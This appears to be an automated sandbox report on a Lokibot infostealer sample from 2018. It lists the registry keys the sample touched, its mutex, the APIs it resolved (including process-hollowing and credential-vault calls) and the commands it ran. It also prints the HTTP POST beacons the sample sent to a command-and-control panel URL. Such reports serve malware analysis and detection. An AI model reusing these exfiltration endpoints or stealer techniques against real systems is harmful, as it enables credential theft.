HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENBreakOnWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenRegistryAccessCount
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceBreakOnStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenMaxLogSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceTestHookDll
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServicePolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\RootstoreDirty
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENUseService
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitAggressiveWork
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceConservative
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitWorking
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenWorkerCount
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\EnableMultiproc
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\SvcRetryNgenFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenLocalWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceRestrictWorkersPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWorkerPriority
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGENBreakOnWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenRegistryAccessCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir

Write Keys

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start

Delete Keys

Nothing to display

Mutexes

D448845E628773E4A9A809DA

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.WideCharToMultiByte
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
dwmapi.dll.DwmIsCompositionEnabled
rpcrt4.dll.UuidFromStringW
radarrs.dll.WdiDiagnosticModuleMain
radarrs.dll.WdiHandleInstance
radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion
mscorsvc.dll.CorGetSvc
advapi32.dll.StartServiceCtrlDispatcherW
kernel32.dll.VerSetConditionMask
kernel32.dll.VerifyVersionInfoW
advapi32.dll.RegisterServiceCtrlHandlerExW
advapi32.dll.SetServiceStatus
advapi32.dll.OpenSCManagerW
advapi32.dll.OpenServiceW
advapi32.dll.ChangeServiceConfigW
advapi32.dll.CloseServiceHandle
mscoree.dll.CorIsLatestSvc
mscoreei.dll.CorIsLatestSvc
msidle.dll.#8
wtsapi32.dll.WTSQuerySessionInformationW
wtsapi32.dll.WTSFreeMemory
wtsapi32.dll.WTSEnumerateSessionsW
winsta.dll.WinStationEnumerateW
advapi32.dll.CreateWellKnownSid
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.I_RpcExceptionFilter
rpcrt4.dll.RpcBindingFree
winsta.dll.WinStationFreeMemory
powrprof.dll.CallNtPowerInformation
mscoree.dll.GetCORRootDirectory
mscoreei.dll.GetCORRootDirectory

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP"
C:\Windows\system32\lsass.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

Started Services

VaultSvc

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-30 16:55:30 2018-06-30 16:58:41 191

2 HTTP Request(s) detected

http://abatii.web.id/smart/Panel/five/fre.php
  • Hostname: abatii.web.id
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 2

POST /smart/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: abatii.web.id
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 1ECB906E
Content-Length: 192
Connection: close

http://abatii.web.id/smart/Panel/five/fre.php
  • Hostname: abatii.web.id
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 11

POST /smart/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: abatii.web.id
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 1ECB906E
Content-Length: 165
Connection: close

#infosec #automation

TheSystem Itself @ 2018-06-30 17:00:20

Detected family: #Lokibot

TheSystem Itself @ 2018-06-30 17:06:04